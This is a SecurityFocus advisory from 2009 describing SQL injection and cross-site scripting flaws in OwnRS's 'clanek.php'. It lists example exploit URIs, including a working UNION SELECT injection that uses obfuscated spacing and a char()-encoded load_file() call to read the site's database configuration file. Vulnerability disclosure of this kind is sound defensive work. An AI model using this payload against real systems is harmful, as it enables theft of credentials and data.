Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

OwnRS 'clanek.php' Multiple Input Validation Vulnerabilities

An attacker can exploit these issues via a browser. To exploit a cross-site scripting vulnerability, the attacker must entice a victim to follow a malicious URI.

The following example URIs are available:

http://www.example.com/[Ownrs_path]/clanek.php?id=[SQL Injection]
http://www.example.com/[Ownrs_path]/clanek.php?id=<XSS>
http://www.example.com/own/clanek.php?id=1'/**/UNION/**/ALL/**/SELECT/**/1,2,load_file(char(67,58,92,120,97,109,112,112,92,104,116,100,111,99,115,92,79,119,110,92,100,98,46,112,104,112)),4,5,6,7,8,9,10/**/FROM/**/autori/**/WHERE/**/id='1







 

Privacy Statement
Copyright 2009, SecurityFocus